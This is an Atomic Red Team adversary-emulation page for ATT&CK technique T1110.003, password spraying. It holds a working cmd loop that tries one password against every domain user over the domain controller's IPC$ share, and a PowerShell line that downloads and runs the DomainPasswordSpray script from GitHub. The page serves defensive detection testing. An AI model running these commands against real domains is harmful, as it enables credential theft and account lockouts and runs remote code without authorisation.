# T1110.003 - Password Spraying
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.003)
<blockquote>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</blockquote>

## Atomic Tests

- [Atomic Test #1 - Password Spray all Domain Users](#atomic-test-1---password-spray-all-domain-users)

- [Atomic Test #2 - Password Spray (DomainPasswordSpray)](#atomic-test-2---password-spray-domainpasswordspray)


<br/>

## Atomic Test #1 - Password Spray all Domain Users
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| password | The password to try for each user in users.txt | string | Spring2020|


#### Attack Commands: Run with `command_prompt`! 


```cmd
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
```




#### Dependencies:  Run with `command_prompt`!
##### Description: List of domain users to password spray must exits at %temp%\users.txt
##### Check Prereq Commands:
```cmd
if not exist %temp%\users.txt (exit /b 1) 
```
##### Get Prereq Commands:
```cmd
PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
```




<br/>
<br/>

## Atomic Test #2 - Password Spray (DomainPasswordSpray)
Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain

https://github.com/dafthack/DomainPasswordSpray

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)|


#### Attack Commands: Run with `powershell`! 


```powershell
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
```






<br/>
